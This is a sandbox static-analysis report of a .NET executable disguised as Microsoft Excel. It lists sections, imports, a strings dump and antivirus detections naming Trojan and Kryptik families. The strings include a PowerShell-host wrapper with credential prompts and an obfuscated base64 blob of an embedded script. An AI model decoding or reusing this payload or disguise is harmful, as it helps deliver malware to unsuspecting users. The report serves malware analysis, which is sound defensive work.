Static | ZeroBOX

PE Compile Time

2021-09-30 21:11:59

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x00016cf4 0x00016e00 4.75299627614
.rsrc 0x0001a000 0x0001a598 0x0001a600 3.96218937945
.reloc 0x00036000 0x0000000c 0x00000200 0.101910425663

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x00033ee0 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00033ee0 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00033ee0 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00033ee0 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00033ee0 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x00033ee0 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_GROUP_ICON 0x00034348 0x0000005a LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_VERSION 0x0001a220 0x00000324 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x000343a8 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
**x2s
**xTs
$XK
$XK
$XK
Z+X(\
Z+X(\
v4.0.30319
#Strings
<Module>
EXCEL.exe
Credential_Form
ModuleNameSpace
CREDUI_INFO
CREDUI_FLAGS
CredUI_ReturnCodes
User_Pwd
MainModuleRawUI
Input_Box
Choice_Box
ReadKey_Box
Keyboard_Form
Progress_Form
Progress_Data
Console_Info
FileType
STDHandle
MainModuleUI
MainModule
ConsoleColorProxy
MainAppInterface
MainApp
mscorlib
System
Object
ValueType
System.Management.Automation
System.Management.Automation.Host
PSHostRawUserInterface
System.Windows.Forms
PSHostUserInterface
PSHost
System.Text
StringBuilder
CredUIPromptForCredentials
PSCredentialTypes
PSCredentialUIOptions
PromptForPassword
cbSize
hwndParent
pszMessageText
pszCaptionText
hbmBanner
value__
INCORRECT_PASSWORD
DO_NOT_PERSIST
REQUEST_ADMINISTRATOR
EXCLUDE_CERTIFICATES
REQUIRE_CERTIFICATE
SHOW_SAVE_CHECK_BOX
ALWAYS_SHOW_UI
REQUIRE_SMARTCARD
PASSWORD_ONLY_OK
VALIDATE_USERNAME
COMPLETE_USERNAME
PERSIST
SERVER_CREDENTIAL
EXPECT_CONFIRMATION
GENERIC_CREDENTIALS
USERNAME_TARGET_CREDENTIALS
KEEP_USERNAME
NO_ERROR
ERROR_CANCELLED
ERROR_NO_SUCH_LOGON_SESSION
ERROR_NOT_FOUND
ERROR_INVALID_ACCOUNT_NAME
ERROR_INSUFFICIENT_BUFFER
ERROR_INVALID_PARAMETER
ERROR_INVALID_FLAGS
Password
Domain
ConsoleColor
GUIBackgroundColor
GUIForegroundColor
get_BackgroundColor
set_BackgroundColor
get_BufferSize
set_BufferSize
Coordinates
get_CursorPosition
set_CursorPosition
get_CursorSize
set_CursorSize
Invisible_Form
FlushInputBuffer
get_ForegroundColor
set_ForegroundColor
BufferCell
Rectangle
GetBufferContents
get_KeyAvailable
get_MaxPhysicalWindowSize
get_MaxWindowSize
KeyInfo
ReadKeyOptions
ReadKey
ScrollBufferContents
SetBufferContents
get_WindowPosition
set_WindowPosition
get_WindowSize
set_WindowSize
get_WindowTitle
set_WindowTitle
BackgroundColor
BufferSize
CursorPosition
CursorSize
ForegroundColor
KeyAvailable
MaxPhysicalWindowSize
MaxWindowSize
WindowPosition
WindowSize
WindowTitle
MB_GetString
DialogResult
System.Collections.ObjectModel
Collection`1
ChoiceDescription
ToUnicode
GetCharFromKeys
checkKeyDown
keyinfo
KeyEventArgs
Keyboard_Form_KeyDown
Keyboard_Form_KeyUp
ProgressBarColor
System.Timers
barNumber
barValue
inTick
System.Collections.Generic
List`1
progressDataList
System.Drawing
DrawingColor
InitializeComponent
ElapsedEventArgs
TimeTick
AddBar
GetCount
ProgressRecord
Update
lbActivity
lbStatus
ProgressBar
objProgressBar
lbRemainingTime
lbOperation
ActivityId
ParentActivityId
GetStdHandle
GetFileType
IsInputRedirected
IsOutputRedirected
IsErrorRedirected
FILE_TYPE_UNKNOWN
FILE_TYPE_DISK
FILE_TYPE_CHAR
FILE_TYPE_PIPE
FILE_TYPE_REMOTE
STD_INPUT_HANDLE
STD_OUTPUT_HANDLE
STD_ERROR_HANDLE
ErrorForegroundColor
ErrorBackgroundColor
WarningForegroundColor
WarningBackgroundColor
DebugForegroundColor
DebugBackgroundColor
VerboseForegroundColor
VerboseBackgroundColor
ProgressForegroundColor
ProgressBackgroundColor
Dictionary`2
PSObject
FieldDescription
Prompt
PromptForChoice
PSCredential
PromptForCredential
get_RawUI
ib_caption
ib_message
ReadLine
System.Security
SecureString
getPassword
ReadLineAsSecureString
WriteDebugLine
WriteErrorLine
WriteLine
WriteProgress
WriteVerboseLine
WriteWarningLine
parent
System.Globalization
CultureInfo
originalCultureInfo
originalUICultureInfo
get_PrivateData
_consoleColorProxy
get_CurrentCulture
get_CurrentUICulture
get_InstanceId
get_Name
get_UI
Version
get_Version
EnterNestedPrompt
ExitNestedPrompt
NotifyBeginApplication
NotifyEndApplication
SetShouldExit
PrivateData
CurrentCulture
CurrentUICulture
InstanceId
get_ErrorForegroundColor
set_ErrorForegroundColor
get_ErrorBackgroundColor
set_ErrorBackgroundColor
get_WarningForegroundColor
set_WarningForegroundColor
get_WarningBackgroundColor
set_WarningBackgroundColor
get_DebugForegroundColor
set_DebugForegroundColor
get_DebugBackgroundColor
set_DebugBackgroundColor
get_VerboseForegroundColor
set_VerboseForegroundColor
get_VerboseBackgroundColor
set_VerboseBackgroundColor
get_ProgressForegroundColor
set_ProgressForegroundColor
get_ProgressBackgroundColor
set_ProgressBackgroundColor
get_ShouldExit
set_ShouldExit
get_ExitCode
set_ExitCode
ShouldExit
ExitCode
shouldExit
exitCode
UnhandledExceptionEventArgs
CurrentDomain_UnhandledException
credinfo
targetName
reserved1
iError
userName
maxUserName
password
maxPassword
pfSave
System.Runtime.InteropServices
MarshalAsAttribute
UnmanagedType
caption
message
target
credTypes
options
rectangle
source
destination
origin
contents
strTitle
strPrompt
strVal
blSecure
arrChoice
intDefault
wVirtKey
wScanCode
lpKeyState
pwszBuff
OutAttribute
cchBuff
wFlags
blShift
blAltGr
blIncludeKeyDown
sender
position
BarColor
objRecord
stdHandle
descriptions
choices
defaultChoice
allowedCredentialTypes
foregroundColor
backgroundColor
sourceId
record
System.Reflection
AssemblyTitleAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyTrademarkAttribute
AssemblyVersionAttribute
AssemblyFileVersionAttribute
AssemblyDescriptionAttribute
AssemblyCompanyAttribute
System.Runtime.CompilerServices
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
DllImportAttribute
credui
String
IsNullOrEmpty
Marshal
SizeOf
IntPtr
ToString
StructLayoutAttribute
LayoutKind
FlagsAttribute
set_Opacity
set_ShowInTaskbar
Control
set_Visible
get_Bottom
get_Top
get_Right
get_Left
Address
BufferCellType
set_Height
set_Width
AppDomain
get_CurrentDomain
get_FriendlyName
user32.dll
ContainerControl
set_AutoScaleDimensions
AutoScaleMode
set_AutoScaleMode
TextBox
Button
set_Text
set_Location
Screen
FromControl
get_Bounds
get_Width
set_MaximumSize
set_AutoSize
ControlCollection
get_Controls
set_UseSystemPasswordChar
SetBounds
PtrToStringUni
set_DialogResult
set_ClientSize
AddRange
FormBorderStyle
set_FormBorderStyle
FormStartPosition
set_StartPosition
Assembly
GetExecutingAssembly
get_Location
ExtractAssociatedIcon
set_Icon
set_MinimizeBox
set_MaximizeBox
IButtonControl
set_AcceptButton
set_CancelButton
ShowDialog
get_Text
get_Count
RadioButton
ToolTip
IEnumerator`1
GetEnumerator
get_Current
get_Label
set_Checked
get_Height
get_HelpMessage
SetToolTip
System.Collections
IEnumerator
MoveNext
IDisposable
Dispose
set_ShowAlways
get_Checked
KeyEventHandler
add_KeyDown
add_KeyUp
get_KeyValue
set_VirtualKeyCode
get_KeyCode
get_Shift
get_Alt
get_Control
get_Chars
set_Character
set_KeyDown
ControlKeyStates
set_ControlKeyState
get_ControlKeyState
get_Modifiers
get_Black
get_Blue
get_Cyan
ColorTranslator
FromHtml
get_Magenta
get_Red
get_White
get_Yellow
SuspendLayout
ScrollableControl
set_AutoScroll
set_BackColor
set_ControlBox
ResumeLayout
ElapsedEventHandler
add_Elapsed
set_Interval
set_AutoReset
get_Item
set_Value
Refresh
set_Left
set_Top
get_Font
FontStyle
set_Font
ProgressBarStyle
set_Style
set_ForeColor
set_Size
get_ActivityId
ProgressRecordType
get_RecordType
Remove
System.ComponentModel
Component
RemoveAt
get_ParentActivityId
Insert
get_Activity
get_StatusDescription
get_PercentComplete
get_SecondsRemaining
TimeSpan
get_TotalHours
get_Minutes
get_Seconds
Format
Concat
get_CurrentOperation
Application
DoEvents
Kernel32.dll
MessageBox
get_ParameterAssemblyFullName
RuntimeTypeHandle
GetTypeFromHandle
GetType
get_IsArray
GetElementType
MakeGenericType
EmptyTypes
ConstructorInfo
BindingFlags
Binder
ParameterModifier
GetConstructor
Invoke
Convert
ChangeType
InvokeMember
op_Inequality
op_Equality
get_DefaultValue
Exception
ToCharArray
AppendChar
Console
ConsoleKeyInfo
ConsoleKey
get_Key
get_Length
get_KeyChar
MessageBoxButtons
MessageBoxIcon
System.Threading
Thread
get_CurrentThread
NewGuid
AsPSObject
ArgumentNullException
STAThreadAttribute
<>c__DisplayClass5
ManualResetEvent
DataAddedEventArgs
<Main>b__0
IAsyncResult
<Main>b__2
<>c__DisplayClass7
CS$<>8__locals6
PSDataCollection`1
colOutput
<Main>b__1
ErrorRecord
get_Index
get_IsCompleted
EventWaitHandle
EnableVisualStyles
UnhandledExceptionEventHandler
add_UnhandledException
System.Management.Automation.Runspaces
RunspaceFactory
Runspace
CreateRunspace
ApartmentState
set_ApartmentState
PowerShell
Create
set_Runspace
PSDataStreams
get_Streams
get_Error
EventHandler`1
add_DataAdded
Complete
Replace
Compare
StringComparison
StartsWith
StringSplitOptions
System.Diagnostics
Debugger
Launch
Encoding
get_UTF8
FromBase64String
GetString
System.IO
WriteAllText
AddScript
System.Text.RegularExpressions
get_Success
GroupCollection
get_Groups
Double
TryParse
AddParameter
Capture
get_Value
ToUpper
Boolean
AddArgument
AddCommand
AsyncCallback
PSInvocationSettings
BeginInvoke
WaitHandle
WaitOne
PSInvocationStateInfo
get_InvocationStateInfo
PSInvocationState
get_State
get_Reason
get_Message
CompilerGeneratedAttribute
Microsoft Excel
Microsoft Office
16.0.12827.20336
Microsoft Corporation
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
I6& $
+>#{_H?
Td&d"6"
Fay!Jj
5w"'q<
Fay!Jj
>-m-x`
lb&=SbRP
\U((/@
]Bi^1/
o^RnjO
2}.92}.i2}.
2}.I2}.y2}.
2}.)2}.Y2}.
2}.92}.i2}.
2}.I2}.y2}.
2}.)2}.Y2}.
2}.92}.i2}.
2}.I2}.y2}.
2}.)2}.Y2}.
2}.92}.i2}.
2}.I2}.y2}.
2}.)2}.Y2}.
2}."2}.
2}."2}.
2}."2}.
2}."2}.
2}.'2}.W2}.
2}.G2}.w2}.
2}.72}.g2}.
2}.'2}.W2}.
2}.G2}.w2}.
2}.72}.g2}.
2}.'2}.W2}.
2}.G2}.w2}.
2}.72}.g2}.
2}.'2}.W2}.
2}.G2}.w2}.
2}.72}.g2}.
2}.02}.`2}.
2}.@2}.p2}.
2}.!2}.P2}.
2}.02}.`2}.
2}.@2}.p2}.
2}. 2}.P2}.
2}.K2}.
2}.K2}.
2}. 2}.O2}.
2}.?2}.o2}.
2}./2}._2}.
2}. 2}.O2}.
2}.?2}.o2}.
2}./2}._2}.
2}.'2}.V2}.v2}.&
2}.62}.f2}.
2}.F2}.v2}.
2}.'2}.V2}.
2}.62}.f2}.
2}.52}.f2}.
2}.'2}.U2}.
2}.E2}.u2}.
2}.62}.e2}.
2}.'2}.V2}.w2}.'
2}.,2}.\2}.
2}.<2}.l2}.
2}.L2}.|2}.
2}.L2}.{2}.
2}.<2}.k2}.
2}.,2}.[2}.
2}."2}.R2}.l
2}.22}.b2}.
2}.22}.b2}.
2}."2}.R2}.l
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
Secure input:
Input:
Cancel
Press a key
#000080
#808080
#008000
#008080
#800080
#800000
#808000
#C0C0C0
#00FF00
Remaining time:
{0:00}:{1:00}:{2:00}
System.Collections.Generic.List
{0}[{1}]:
ToArray
(Type !? for help.)
Wrong format, please repeat input:
PSRunspace-Host
-whatt
-extdummt
If you spzzcify thzz -zzxtract option you nzzed to add a filzz for zzxtraction in this way
-zzxtract:"<filzznamzz>"
-debug
JGJlc3Q2NGNvZGUgPSAiSzBBYnpOWExnRXpOMEFUTWdRbmN2QlhMZ0FqTHc0Q011QURJd2xXTGdZWFpTSldaWDFTWnI5bWR1bGtDTklTWnU5bVRpQVNQZ1UyWXVWbWNsWldaeUJWYnlsbVp1OTJRa0F5T2dJU1oxNVdhMDUyYkRsSGIwNVdac2wyVWlBU1BnVTJZdVZtY2xaV1p5QjFjelZtY245bWNRUkNJN0FpSWxWbmJwUm5idk5VZXNSbmJseFdhVEpDSTlBU1pqNVdaeVZtWmxKSFV1OVdhME5XUXk5bWN5VkVKSzB3T3NOM2N0QXlNMFFESTBKM2J3MUNJMk1UTXVRak15NENPMkVqTHlrVE1nQVhhdEFpZGxKbFlsZFZMbHQyYjI1V1Nqb1FESzBRZkswd09oUlhZa1JDSWh0V1o0bG1jMjFTYWwxU1lyTlhac0ZHZGdBQ0lnb1FEcGt5Y3o5RmR5TjJja2dpVVVObFF2UjFadWxtYzBOVlp5VjNZbE5sTzYwRmJoaDJjeUZXVHVNWFpqbG1keVYyVXc5bWNsUm5iSjVTWnRsR2R1Vm5VYmh5YjBWWFFuNVdheVIzVXZSbGMwQmxPNjBGYmhoMmN5RldUdU1YWmpsbWR5VjJVdzltY2xSbmJKNVNadGxHZHVWblViQlNQZ0VHZGhSR0pnQUNJZ29RRHJSQ0k1VjJTdEF5WnVsbWMwTlZaeVYzWWxOVkx2UkZkeVZtZHU5MlFnd0hJMEozWXpSQ0k5QXljejlGZHlOMmNrQUNJZ0FpQ05JU1FaZFVRcEpVVVBGMFpFRmtNQkZrVEJ0R1JCMW1RQjFVUVpSVVFzSlVRYUYwWUVGME1CRmxXQlZGUkJwbVFCMVVRQlJVUTFFMGRORlVSRUZFTUJkblRCbDBSQmhYUUI1VVFKUlVReEVVUU9GVVdIRlViQ0ZWV0JWRVJCaFhRbjFVUUpkVVExRTBaWkYwYUVGVWVCRmtUQk5HUkJ4bVFuNVVRalJVUTRGMGRP
^-([^: ]+)[ :]?([^:]*)$
$FALSE
out-string
stream
Click OK to exit...
Unhandled exception in
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
CompanyName
Microsoft Corporation
FileDescription
Microsoft Excel
FileVersion
16.0.12827.20336
InternalName
EXCEL.exe
LegalCopyright
OriginalFilename
EXCEL.exe
ProductName
Microsoft Office
ProductVersion
16.0.12827.20336
Assembly Version
16.0.12827.20336
Antivirus Signature
Bkav Clean
Lionic Clean
Elastic Clean
MicroWorld-eScan Clean
CMC Clean
CAT-QuickHeal Trojan.WacatacFC.S15903510
McAfee Artemis!6422332249A3
Malwarebytes Clean
Sangfor Clean
K7AntiVirus Clean
Alibaba Clean
K7GW Clean
CrowdStrike Clean
Baidu Clean
Cyren W32/MSIL_Kryptik.BWA.gen!Eldorado
Symantec Clean
ESET-NOD32 Clean
APEX Malicious
Paloalto Clean
ClamAV Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Ad-Aware Clean
Comodo Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Win32.Generic.ct
FireEye Generic.mg.6422332249a3e867
Sophos Clean
SentinelOne Static AI - Malicious PE
GData Clean
Jiangmin Clean
Webroot Clean
Avira Clean
MAX Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Cynet Clean
AhnLab-V3 Trojan/Win32.Kryptik.C4247069
Acronis Clean
BitDefenderTheta Gen:NN.ZemsilF.34170.mm0@aKhp31h
ALYac Clean
TACHYON Clean
VBA32 Clean
Cylance Unsafe
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Clean
Yandex Clean
Ikarus Clean
eGambit Unsafe.AI_Score_96%
Fortinet Clean
Avast Clean
MaxSecure Clean
No IRMA results available.